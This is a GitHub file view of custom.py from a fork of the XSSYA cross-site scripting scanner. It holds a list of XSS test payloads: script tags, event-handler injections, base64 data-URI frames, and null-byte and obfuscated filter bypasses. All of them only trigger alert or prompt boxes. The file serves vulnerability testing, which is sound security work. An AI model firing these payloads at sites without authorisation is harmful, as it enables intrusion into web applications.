forked from yehia-mamdouh/XSSYA
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathcustom.py
More file actions
42 lines (36 loc) · 2.17 KB
/
custom.py
File metadata and controls
42 lines (36 loc) · 2.17 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
#!/usr/bin/env python
# -*- coding: cp1252 -*-
# XSSA is a Cross Site Scripting Scanner & Vulnerability Confirmation
# By Yehia Mamdouh - twitter.com/@Yehia1mamdouh / Facebook/yehia.mamdouh.98
import urllib
import re
import urllib2
class check:
def __init__(self):
self.hit = ["<script>alert('XSSYA')</script>",
"1<ScRiPt >prompt(962477)</sCripT>",
"<script>alert('xssya')</script>",
"'';!--\"<XSS>=&{()}",
"<ScRipt>ALeRt('xssya');</sCRipT>",
"<body/onhashchange=alert(1)><a href=#>clickit",
"<img src=x onerror=prompt(1);>",
"%3cvideo+src%3dx+onerror%3dprompt(1)%3b%3e",
"<iframesrc=\"javascript:alert(2)\">",
"<iframe/src=\"data:text/html;	base64
,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\">",
"<form action=\"Javascript:alert(1)\"><input type=submit>",
"<isindex action=data:text/html, type=image>",
"<object data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=\">",
"<svg/onload=prompt(1);>",
"<marquee/onstart=confirm(2)>/",
"<body onload=prompt(1);>",
"<q/oncut=open()>",
"<a onmouseover=location=’javascript:alert(1)>click",
"<svg><script>alert(/1/)</script>",
"</script><script>alert(1)</script>",
"<scri%00pt>alert(1);</scri%00pt>",
"<scri%00pt>confirm(0);</scri%00pt>",
"5\x72\x74\x28\x30\x29\x3B'>rhainfosec",
"<isindex action=j	a	vas	c	r	ipt:alert(1) type=image>",
"<marquee/onstart=confirm(2)>",
"<A HREF=\"http://www.google.com./\">XSS</A>",
"<svg/onload=prompt(1);>",]